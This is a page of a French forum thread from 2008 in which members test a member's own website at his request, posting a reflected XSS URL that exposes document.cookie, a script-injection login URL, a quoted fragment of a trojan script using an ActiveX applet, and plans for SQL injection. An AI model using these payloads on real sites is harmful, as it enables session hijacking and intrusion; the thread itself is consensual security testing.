Plop =)
==>[url]http://sliim.projects.free.fr/inc/private/[/url] :roll:
Test de : http://sliim.projects.free.fr
28 posts
• Page 2 of 2 • 1, 2
by speiter » Wed May 28, 2008 8:53 pm
houa on parle d'un truc que j'ai reussi a trouver je suis trop content :D
edit: en fait avec le lien apres on peut afficher n'importe quel message ne alerte , mais jvoit pas l'utilité!! :D
edit: en fait avec le lien apres on peut afficher n'importe quel message ne alerte , mais jvoit pas l'utilité!! :D
Last edited by speiter on Fri May 30, 2008 9:54 pm, edited 1 time in total.
-
speiter - Projets
- Posts: 19
- Joined: Fri May 23, 2008 2:21 pm
- Location: metz
by Sliim » Wed May 28, 2008 10:01 pm
[quote:85ddf3d198="Itachi018"]Plop =)
==>[url]http://sliim.projects.free.fr/inc/private/[/url] :roll:[/quote:85ddf3d198]
Argh !! je suis en train d'essayer de protéger mon dossier avec un .htaccess mais j'ai une belle erreur 500 (Erreur 500 - Erreur interne du serveur) quand j'upload mes fichiers .htaccess et .htpasswd :? . Comprend pas, cela viendrait de free ??
Dans le fichier .htpasswd que je mette le mot de passe en clair ou crypté j'obtiens la même erreur :cry:
++
==>[url]http://sliim.projects.free.fr/inc/private/[/url] :roll:[/quote:85ddf3d198]
Argh !! je suis en train d'essayer de protéger mon dossier avec un .htaccess mais j'ai une belle erreur 500 (Erreur 500 - Erreur interne du serveur) quand j'upload mes fichiers .htaccess et .htpasswd :? . Comprend pas, cela viendrait de free ??
Dans le fichier .htpasswd que je mette le mot de passe en clair ou crypté j'obtiens la même erreur :cry:
++
-
Sliim - Site Admin
- Posts: 1177
- Joined: Fri May 16, 2008 12:53 pm
by Thackyner » Wed May 28, 2008 10:20 pm
Voici l'example d'un fichier .htaccess qui fonctionne chez free :
[quote:87ce75ec2d]PerlSetVar AuthFile /dossieraproteger/.htpasswd
AuthName "Acces Restreint"
AuthType Basic
require valid-user[/quote:87ce75ec2d]
Et celui d'un .passwd qui fonctionne aussi chez free :
[quote:87ce75ec2d]login:lemotdepassenclair[/quote:87ce75ec2d]
En effet, free veut que les mots de passe soient en clair :)
[quote:87ce75ec2d]PerlSetVar AuthFile /dossieraproteger/.htpasswd
AuthName "Acces Restreint"
AuthType Basic
require valid-user[/quote:87ce75ec2d]
Et celui d'un .passwd qui fonctionne aussi chez free :
[quote:87ce75ec2d]login:lemotdepassenclair[/quote:87ce75ec2d]
En effet, free veut que les mots de passe soient en clair :)
- Thackyner
- Projets
- Posts: 2
- Joined: Wed May 28, 2008 5:51 pm
by Itachi018 » Wed May 28, 2008 10:28 pm
Re =)
Sliim => Tu est sûr ? Car le .htaccess est bien opératif sur ton lien la ^^
Lorsque tu [u:2831a761cb]annule [/u:2831a761cb]tu as une Erreur 401 - Accès à la ressource refusé , mais ça c'est normal non ^^ ?
[b:2831a761cb][u:2831a761cb]EDIT[/u:2831a761cb][/b:2831a761cb] : [b:2831a761cb]il n'est plus installé..oO Ou bien c'est toi ou bien c'est free..[/b:2831a761cb]
Sliim => Tu est sûr ? Car le .htaccess est bien opératif sur ton lien la ^^
Lorsque tu [u:2831a761cb]annule [/u:2831a761cb]tu as une Erreur 401 - Accès à la ressource refusé , mais ça c'est normal non ^^ ?
[b:2831a761cb][u:2831a761cb]EDIT[/u:2831a761cb][/b:2831a761cb] : [b:2831a761cb]il n'est plus installé..oO Ou bien c'est toi ou bien c'est free..[/b:2831a761cb]
-
Itachi018 - Projets
- Posts: 225
- Joined: Fri Feb 08, 2008 7:05 pm
by Sliim » Wed May 28, 2008 10:35 pm
[quote:11f6ccfc8e="Itachi018"]Re =)
Sliim => Tu est sûr ? Car le .htaccess est bien opératif sur ton lien la ^^
Lorsque tu [u:11f6ccfc8e]annule [/u:11f6ccfc8e]tu as une Erreur 401 - Accès à la ressource refusé , mais ça c'est normal non ^^ ?
[b:11f6ccfc8e][u:11f6ccfc8e]EDIT[/u:11f6ccfc8e][/b:11f6ccfc8e] : [b:11f6ccfc8e]il n'est plus installé..oO Ou bien c'est toi ou bien c'est free..[/b:11f6ccfc8e][/quote:11f6ccfc8e]
ça peut venir de moi :lol: , je bosse dessus en ce moment. J'ai l'impression que mon .htaccess n'aime pas trop le fait que mon dossier se nomme 'inc'.
++
[EDIT] : bon j'ai renommé mon dossier 'inc' en 'include' mais cela n'a pas réglé le problème :cry: . J'ai l'impression que le .htaccess est un peu bancal car il a fonctionné pour certains dossiers de tests mais quand je le met dans mon dossier include cela ne marche plus :? .
Sans doute la fatigue qui me joue des tours :wink: .
Sinon, qui est l'auteur du petit script envoyé par message ?? je suis curieux de savoir le but de celui ci :) .
Merci Thackyner pour tes exemples :wink:
++
[RE-EDIT] : Les fait qu'il y ait des include() dans ma page d'accueil qui appel mes pages de mon dossier 'donnees' (anciennement 'include' et encore plus anciennement 'inc') ne fait il pas qu'il faille s'authentifier pour visualiser la page d'accueil ???
Il faut vraiment que j'aille me coucher moi, j'ai le cerveau qui chauffe :lol: .
++
Sliim => Tu est sûr ? Car le .htaccess est bien opératif sur ton lien la ^^
Lorsque tu [u:11f6ccfc8e]annule [/u:11f6ccfc8e]tu as une Erreur 401 - Accès à la ressource refusé , mais ça c'est normal non ^^ ?
[b:11f6ccfc8e][u:11f6ccfc8e]EDIT[/u:11f6ccfc8e][/b:11f6ccfc8e] : [b:11f6ccfc8e]il n'est plus installé..oO Ou bien c'est toi ou bien c'est free..[/b:11f6ccfc8e][/quote:11f6ccfc8e]
ça peut venir de moi :lol: , je bosse dessus en ce moment. J'ai l'impression que mon .htaccess n'aime pas trop le fait que mon dossier se nomme 'inc'.
++
[EDIT] : bon j'ai renommé mon dossier 'inc' en 'include' mais cela n'a pas réglé le problème :cry: . J'ai l'impression que le .htaccess est un peu bancal car il a fonctionné pour certains dossiers de tests mais quand je le met dans mon dossier include cela ne marche plus :? .
Sans doute la fatigue qui me joue des tours :wink: .
Sinon, qui est l'auteur du petit script envoyé par message ?? je suis curieux de savoir le but de celui ci :) .
Merci Thackyner pour tes exemples :wink:
++
[RE-EDIT] : Les fait qu'il y ait des include() dans ma page d'accueil qui appel mes pages de mon dossier 'donnees' (anciennement 'include' et encore plus anciennement 'inc') ne fait il pas qu'il faille s'authentifier pour visualiser la page d'accueil ???
Il faut vraiment que j'aille me coucher moi, j'ai le cerveau qui chauffe :lol: .
++
-
Sliim - Site Admin
- Posts: 1177
- Joined: Fri May 16, 2008 12:53 pm
by ZeRo_XaN » Thu May 29, 2008 11:41 am
http://sliim.projects.free.fr/Sources/AJAX/test.php?vartest=%3Cscript%3Ealert(document.cookie)%3C/script%3E
xss aussi. Mais bon vu les dossiers où ça se trouve sa ressemble à une construction en cours donc bon....
xss aussi. Mais bon vu les dossiers où ça se trouve sa ressemble à une construction en cours donc bon....
-
ZeRo_XaN - Projets
- Posts: 28
- Joined: Mon Oct 22, 2007 6:50 pm
by Sliim » Thu May 29, 2008 12:08 pm
[quote:b007d720ee="ZeRo_XaN"]http://sliim.projects.free.fr/Sources/AJAX/test.php?vartest=%3Cscript%3Ealert(document.cookie)%3C/script%3E
xss aussi. Mais bon vu les dossiers où ça se trouve sa ressemble à une construction en cours donc bon....[/quote:b007d720ee]
:shock: je ne pensais vraiment pas à ce genre de chose, bien trouvé :wink: .
PS : bon mon dossier 'private' est protégé :) (enfin je pense ... ^^). Le dossier 'donnees' ne nécessite pas d'une protection, son contenu ne contient pas d'informations importantes.
xss aussi. Mais bon vu les dossiers où ça se trouve sa ressemble à une construction en cours donc bon....[/quote:b007d720ee]
:shock: je ne pensais vraiment pas à ce genre de chose, bien trouvé :wink: .
PS : bon mon dossier 'private' est protégé :) (enfin je pense ... ^^). Le dossier 'donnees' ne nécessite pas d'une protection, son contenu ne contient pas d'informations importantes.
-
Sliim - Site Admin
- Posts: 1177
- Joined: Fri May 16, 2008 12:53 pm
by Itachi018 » Thu May 29, 2008 1:45 pm
Oui, mais ils ne sont pas importantes....ça dépend pour qui ^^
Justement un bon hacker va pouvoir utilisé n'importe quelles informations pour parvenir à ce qu'il veut :wink: Alors ne laisse pas d'info traîné comme ça pour rien sur ton site ;)
edit :Ya vraiment des trucs louches sur ton site :lol: [url]http://sliim.projects.free.fr/Sources/dojo-0.4.3/demos/gfx/circles.html[/url]
Justement un bon hacker va pouvoir utilisé n'importe quelles informations pour parvenir à ce qu'il veut :wink: Alors ne laisse pas d'info traîné comme ça pour rien sur ton site ;)
edit :Ya vraiment des trucs louches sur ton site :lol: [url]http://sliim.projects.free.fr/Sources/dojo-0.4.3/demos/gfx/circles.html[/url]
-
Itachi018 - Projets
- Posts: 225
- Joined: Fri Feb 08, 2008 7:05 pm
by Sliim » Thu May 29, 2008 3:36 pm
[quote:fb69ca55d4="Itachi018"]Oui, mais ils ne sont pas importantes....ça dépend pour qui ^^
Justement un bon hacker va pouvoir utilisé n'importe quelles informations pour parvenir à ce qu'il veut :wink: Alors ne laisse pas d'info traîné comme ça pour rien sur ton site ;)[/quote:fb69ca55d4]
Pas faux :roll:, je vais essayer de revoir pour mon .htaccess, mais je ne comprend pas pourquoi il me demande une authentification lorsque je l'ai placé dans le dossier 'donnees' :?:
[quote:fb69ca55d4="Itachi018"]
edit :Ya vraiment des trucs louches sur ton site :lol: [url]http://sliim.projects.free.fr/Sources/dojo-0.4.3/demos/gfx/circles.html[/url][/quote:fb69ca55d4]
ça peut paraitre bizarre en effet :wink: . J'avais décidé de mettre les sources de l'API dojo sur mon site suite à un stage où j'avais utilisé cet API pour le développement d'un site web. Et ces sources contiennent des exemples d'applications comme celle ci :wink: .
[code:1:fb69ca55d4]<script><br />
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");<br />
function yuzi3(){<br />
try{<br />
a1=document.applets[0];<br />
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")[/code:1:fb69ca55d4]
Quels sont les effets de ce script ?? Je l'ai reçu par message et a été détecté comme trojan. => "La connection au serveur a été réinitialisée".
++
Justement un bon hacker va pouvoir utilisé n'importe quelles informations pour parvenir à ce qu'il veut :wink: Alors ne laisse pas d'info traîné comme ça pour rien sur ton site ;)[/quote:fb69ca55d4]
Pas faux :roll:, je vais essayer de revoir pour mon .htaccess, mais je ne comprend pas pourquoi il me demande une authentification lorsque je l'ai placé dans le dossier 'donnees' :?:
[quote:fb69ca55d4="Itachi018"]
edit :Ya vraiment des trucs louches sur ton site :lol: [url]http://sliim.projects.free.fr/Sources/dojo-0.4.3/demos/gfx/circles.html[/url][/quote:fb69ca55d4]
ça peut paraitre bizarre en effet :wink: . J'avais décidé de mettre les sources de l'API dojo sur mon site suite à un stage où j'avais utilisé cet API pour le développement d'un site web. Et ces sources contiennent des exemples d'applications comme celle ci :wink: .
[code:1:fb69ca55d4]<script><br />
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");<br />
function yuzi3(){<br />
try{<br />
a1=document.applets[0];<br />
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")[/code:1:fb69ca55d4]
Quels sont les effets de ce script ?? Je l'ai reçu par message et a été détecté comme trojan. => "La connection au serveur a été réinitialisée".
++
-
Sliim - Site Admin
- Posts: 1177
- Joined: Fri May 16, 2008 12:53 pm
by Dededede4 » Sun Aug 03, 2008 5:29 pm
http://sliim.projects.free.admin.fr/auth.php?login=&js=/%3E%3Cscript%3E%3C/script%3Ehackbbs%20fuu
:roll:
C'est même pas le serveur de free :roll:
admin.fr avec les sous-domaine free/project/sliim
Je suis sur que les IP des serveurs sont totalement différente...
( free.fr et et admin.fr )
Faux que je trouve un tuto pour faire ça :p
[Edit] Tenez une preuve : www.admin.fr et rajouter lui autent de sous-domaine que vous le souhaiter : http://dededede4.c.le.meilleur.au.monde.personne.va.lui.casser.la.geule.admin.fr :p
Admin.fr fiche de vous 8)
[Edit2] Et pour te répondre, les effet de se script indique que l'on peux faire un lien piége pour te piquer ton cookie de connections et te connecter a ta place...
Je vais essayer de faire quelques injection sql :p
:roll:
C'est même pas le serveur de free :roll:
admin.fr avec les sous-domaine free/project/sliim
Je suis sur que les IP des serveurs sont totalement différente...
( free.fr et et admin.fr )
Faux que je trouve un tuto pour faire ça :p
[Edit] Tenez une preuve : www.admin.fr et rajouter lui autent de sous-domaine que vous le souhaiter : http://dededede4.c.le.meilleur.au.monde.personne.va.lui.casser.la.geule.admin.fr :p
Admin.fr fiche de vous 8)
[Edit2] Et pour te répondre, les effet de se script indique que l'on peux faire un lien piége pour te piquer ton cookie de connections et te connecter a ta place...
Je vais essayer de faire quelques injection sql :p
- Dededede4
- Projets
- Posts: 50
- Joined: Tue Jun 03, 2008 12:54 pm
28 posts
• Page 2 of 2 • 1, 2
Return to Faites tester vos sites <b>DE TEST</b>
Who is online
Users browsing this forum: No registered users and 1 guest